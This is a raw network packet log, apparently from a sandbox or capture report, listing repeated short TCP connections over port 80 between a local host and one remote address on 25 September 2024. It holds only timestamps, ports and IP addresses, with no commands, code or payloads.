              Sep 25, 2024 10:20:11.013287067 CEST8049771188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.150048971 CEST4977280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.154956102 CEST8049772188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.155062914 CEST4977280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.157373905 CEST4977280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.162230015 CEST8049772188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.162336111 CEST4977280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.167224884 CEST8049772188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.812237024 CEST8049772188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.812458038 CEST8049772188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.812479973 CEST4977280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.812525988 CEST4977280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.817332029 CEST8049772188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.960190058 CEST4977380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.965177059 CEST8049773188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.965255022 CEST4977380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.967433929 CEST4977380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.972373009 CEST8049773188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:11.972431898 CEST4977380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:11.977355957 CEST8049773188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:12.630415916 CEST8049773188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:12.630592108 CEST8049773188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:12.630620956 CEST4977380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:12.630645037 CEST4977380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:12.635415077 CEST8049773188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:12.771414042 CEST4977480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:12.776397943 CEST8049774188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:12.776544094 CEST4977480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:12.779400110 CEST4977480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:12.784241915 CEST8049774188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:12.784342051 CEST4977480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:12.789169073 CEST8049774188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:13.435775995 CEST8049774188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:13.435959101 CEST4977480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:13.436019897 CEST8049774188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:13.436069012 CEST4977480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:13.440851927 CEST8049774188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:13.586915970 CEST4977580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:13.591902018 CEST8049775188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:13.592026949 CEST4977580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:13.595252991 CEST4977580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:13.600229025 CEST8049775188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:13.600308895 CEST4977580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:13.605127096 CEST8049775188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:14.236275911 CEST8049775188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:14.236381054 CEST4977580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:14.236537933 CEST8049775188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:14.236587048 CEST4977580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:14.241223097 CEST8049775188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:14.379278898 CEST4977680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:14.384449959 CEST8049776188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:14.384556055 CEST4977680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:14.386653900 CEST4977680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:14.393145084 CEST8049776188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:14.393220901 CEST4977680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:14.398009062 CEST8049776188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.051773071 CEST8049776188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.051934958 CEST4977680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.053304911 CEST8049776188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.053354979 CEST4977680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.056809902 CEST8049776188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.190659046 CEST4977780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.196909904 CEST8049777188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.197025061 CEST4977780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.199145079 CEST4977780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.203991890 CEST8049777188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.204070091 CEST4977780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.209012032 CEST8049777188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.897368908 CEST8049777188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.897466898 CEST4977780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.897752047 CEST8049777188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:15.897797108 CEST4977780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:15.902726889 CEST8049777188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.034810066 CEST4977880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.039726973 CEST8049778188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.039823055 CEST4977880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.041939020 CEST4977880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.046772003 CEST8049778188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.046849012 CEST4977880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.051692009 CEST8049778188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.724160910 CEST8049778188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.724335909 CEST4977880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.724839926 CEST8049778188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.724931955 CEST4977880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.729212999 CEST8049778188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.862847090 CEST4977980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.867881060 CEST8049779188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.867989063 CEST4977980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.870119095 CEST4977980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.874917030 CEST8049779188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:16.874999046 CEST4977980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:16.879872084 CEST8049779188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:17.550465107 CEST8049779188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:17.550652981 CEST4977980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:17.551028013 CEST8049779188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:17.551080942 CEST4977980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:17.555475950 CEST8049779188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:17.688628912 CEST4978080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:17.693789959 CEST8049780188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:17.693996906 CEST4978080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:17.696146011 CEST4978080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:17.701025963 CEST8049780188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:17.701123953 CEST4978080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:17.706072092 CEST8049780188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:18.430228949 CEST8049780188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:18.430391073 CEST8049780188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:18.430421114 CEST4978080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:18.430460930 CEST4978080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:18.436115026 CEST8049780188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:18.564835072 CEST4978180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:18.569956064 CEST8049781188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:18.570066929 CEST4978180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:18.572189093 CEST4978180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:18.577024937 CEST8049781188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:18.577127934 CEST4978180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:18.581959963 CEST8049781188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:19.235716105 CEST8049781188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:19.235882044 CEST4978180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:19.237006903 CEST8049781188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:19.237060070 CEST4978180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:19.242304087 CEST8049781188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:19.376559019 CEST4978280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:19.381544113 CEST8049782188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:19.381654024 CEST4978280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:19.383768082 CEST4978280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:19.388539076 CEST8049782188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:19.388645887 CEST4978280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:19.393523932 CEST8049782188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:20.044056892 CEST8049782188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:20.044241905 CEST8049782188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:20.044296980 CEST4978280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:20.044296980 CEST4978280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:20.049175024 CEST8049782188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:20.190942049 CEST4978380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:20.195913076 CEST8049783188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:20.196000099 CEST4978380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:20.198115110 CEST4978380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:20.429464102 CEST8049783188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:20.429527998 CEST4978380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:20.434420109 CEST8049783188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.084366083 CEST8049783188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.084561110 CEST4978380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.085623026 CEST8049783188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.085686922 CEST4978380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.089401960 CEST8049783188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.221061945 CEST4978480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.226109028 CEST8049784188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.226210117 CEST4978480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.228310108 CEST4978480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.233179092 CEST8049784188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.233232975 CEST4978480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.238087893 CEST8049784188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.896749020 CEST8049784188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.896883011 CEST4978480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.897192955 CEST8049784188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:21.897242069 CEST4978480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:21.901715040 CEST8049784188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.033376932 CEST4978580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.038305044 CEST8049785188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.038424969 CEST4978580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.040514946 CEST4978580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.045283079 CEST8049785188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.045367002 CEST4978580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.050179958 CEST8049785188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.717554092 CEST8049785188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.717674971 CEST4978580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.717739105 CEST8049785188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.717782021 CEST4978580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.722686052 CEST8049785188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.864341974 CEST4978680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.869329929 CEST8049786188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.869476080 CEST4978680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.871623039 CEST4978680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.876573086 CEST8049786188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:22.876652956 CEST4978680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:22.881505966 CEST8049786188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:23.536905050 CEST8049786188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:23.537060022 CEST4978680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:23.538039923 CEST8049786188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:23.538100958 CEST4978680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:23.542017937 CEST8049786188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:23.673821926 CEST4978780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:23.678993940 CEST8049787188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:23.679106951 CEST4978780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:23.681214094 CEST4978780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:23.686125040 CEST8049787188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:23.686182022 CEST4978780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:23.690994024 CEST8049787188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:24.397758007 CEST8049787188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:24.398011923 CEST4978780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:24.398407936 CEST8049787188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:24.398456097 CEST4978780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:24.402808905 CEST8049787188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:24.532989979 CEST4978880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:24.537951946 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:24.538052082 CEST4978880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:24.540045977 CEST4978880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:24.544960022 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:24.545069933 CEST4978880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:24.550043106 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.365967035 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.366080999 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.366091013 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.366305113 CEST4978880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:25.366305113 CEST4978880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:25.371418953 CEST8049788188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.503875017 CEST4978980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:25.508889914 CEST8049789188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.509041071 CEST4978980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:25.511182070 CEST4978980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:25.516062021 CEST8049789188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:25.516197920 CEST4978980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:25.521086931 CEST8049789188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:26.201577902 CEST8049789188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:26.202085018 CEST8049789188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:26.202166080 CEST4978980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:26.203496933 CEST4978980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:26.208265066 CEST8049789188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:26.354799986 CEST4979080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:26.359735966 CEST8049790188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:26.359909058 CEST4979080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:26.362179995 CEST4979080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:26.367070913 CEST8049790188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:26.367186069 CEST4979080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:26.372035980 CEST8049790188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.025301933 CEST8049790188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.025480986 CEST4979080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.025619030 CEST8049790188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.025671005 CEST4979080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.030371904 CEST8049790188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.175219059 CEST4979180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.180259943 CEST8049791188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.180399895 CEST4979180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.182550907 CEST4979180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.187495947 CEST8049791188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.187594891 CEST4979180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.192553043 CEST8049791188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.837362051 CEST8049791188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.837447882 CEST4979180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.837754011 CEST8049791188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.837788105 CEST4979180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.842255116 CEST8049791188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.992031097 CEST4979280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.996964931 CEST8049792188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:27.997076035 CEST4979280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:27.999268055 CEST4979280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.005045891 CEST8049792188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.005116940 CEST4979280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.011651039 CEST8049792188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.650580883 CEST8049792188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.650713921 CEST8049792188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.650734901 CEST4979280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.650763988 CEST4979280192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.655543089 CEST8049792188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.811358929 CEST4979380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.816227913 CEST8049793188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.816315889 CEST4979380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.818383932 CEST4979380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.823301077 CEST8049793188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:28.823348045 CEST4979380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:28.828100920 CEST8049793188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:29.642699957 CEST8049793188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:29.642863035 CEST4979380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:29.643138885 CEST8049793188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:29.643183947 CEST4979380192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:29.647628069 CEST8049793188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:29.781157970 CEST4979480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:29.786082029 CEST8049794188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:29.786151886 CEST4979480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:29.788256884 CEST4979480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:29.792992115 CEST8049794188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:29.793056965 CEST4979480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:29.797821999 CEST8049794188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:30.571324110 CEST8049794188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:30.571363926 CEST8049794188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:30.571474075 CEST4979480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:30.571561098 CEST4979480192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:30.576546907 CEST8049794188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:30.711003065 CEST4979580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:30.716702938 CEST8049795188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:30.716797113 CEST4979580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:30.718878984 CEST4979580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:30.724201918 CEST8049795188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:30.724247932 CEST4979580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:30.729645967 CEST8049795188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:31.376924038 CEST8049795188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:31.377166986 CEST4979580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:31.377459049 CEST8049795188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:31.377520084 CEST4979580192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:31.382077932 CEST8049795188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:31.517575979 CEST4979680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:31.522809982 CEST8049796188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:31.522897959 CEST4979680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:31.524990082 CEST4979680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:31.529772043 CEST8049796188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:31.529839993 CEST4979680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:31.534734011 CEST8049796188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:32.191046000 CEST8049796188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:32.191159964 CEST4979680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:32.193236113 CEST8049796188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:32.193286896 CEST4979680192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:32.195931911 CEST8049796188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:32.331578970 CEST4979780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:32.341995001 CEST8049797188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:32.342108011 CEST4979780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:32.344170094 CEST4979780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:32.348927021 CEST8049797188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:32.349270105 CEST4979780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:32.354032040 CEST8049797188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.000392914 CEST8049797188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.000474930 CEST4979780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.000767946 CEST8049797188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.000838995 CEST4979780192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.006817102 CEST8049797188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.146752119 CEST4979880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.151680946 CEST8049798188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.151758909 CEST4979880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.153882027 CEST4979880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.158895016 CEST8049798188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.159073114 CEST4979880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.164062023 CEST8049798188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.843158007 CEST8049798188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.843257904 CEST4979880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.843461037 CEST8049798188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.847187042 CEST4979880192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.848087072 CEST8049798188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.992506981 CEST4979980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.997356892 CEST8049799188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:33.997468948 CEST4979980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:33.999581099 CEST4979980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.004687071 CEST8049799188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.004750967 CEST4979980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.009727955 CEST8049799188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.678819895 CEST8049799188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.678915977 CEST4979980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.679104090 CEST8049799188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.679142952 CEST4979980192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.683974981 CEST8049799188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.819960117 CEST4980080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.824750900 CEST8049800188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.824922085 CEST4980080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.826895952 CEST4980080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.831631899 CEST8049800188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:34.831696033 CEST4980080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:34.836503029 CEST8049800188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:35.509651899 CEST8049800188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:35.509821892 CEST8049800188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:35.509846926 CEST4980080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:35.509884119 CEST4980080192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:35.514687061 CEST8049800188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:35.664809942 CEST4980180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:35.669723988 CEST8049801188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:35.669811010 CEST4980180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:35.671930075 CEST4980180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:35.676671028 CEST8049801188.114.97.3192.168.2.7
              Sep 25, 2024 10:20:35.676731110 CEST4980180192.168.2.7188.114.97.3
              Sep 25, 2024 10:20:35.681508064 CEST8049801188.114.97.3192.168.2.7
